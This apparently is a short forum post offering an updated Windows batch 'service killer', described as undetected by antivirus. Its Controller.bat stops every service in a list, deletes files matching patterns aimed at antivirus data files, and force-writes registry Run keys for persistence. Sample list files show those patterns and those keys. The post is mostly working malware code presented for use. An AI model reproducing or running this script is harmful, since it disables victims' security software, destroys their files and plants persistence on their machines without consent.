Heres an update for the service killer. (still remains undetected by AntiViruses)
Now is capable of deleting log files and adding keys (will overwrite keys
if they exist) to the registry.
Here is the main code:
Controller.bat
-=--=-=-=-=-=-
@echo off
SET SRV_LST=services.lst
SET DEL_LOG=logs.lst
SET REG_MOD=regmods.lst
FOR /F "skip=1 eol=> tokens=1 delims=" %%a IN (%SRV_LST%) DO (@net stop %%a /y)
FOR /F "skip=1 eol=> tokens=1 delims=" %%b IN (%DEL_LOG%) DO (@del %%b /s)
FOR /F "skip=1 eol=> tokens=1 delims=" %%c IN (%REG_MOD%) DO (@reg add %%c /f)
-=-=-=-=-=-=-==
! make sure u leave a blank line at the top of the log files !
Example of logs.lst:
-=-=-=-=-
c:\*ANTI-VIR*.DAT
c:\*CHKLIST*.DAT
=-=-=-=-=
Example of regmods.lst (keeps these reg keys one per line, these keys will be added to the registry)
-=-=-=-=-
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v loadcalc /t REG_SZ /d calc.exe
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v loadnote /t REG_SZ /d notepad.exe
-=-=-=-=-
If anyone puts together some good log files let me know.
Cheers





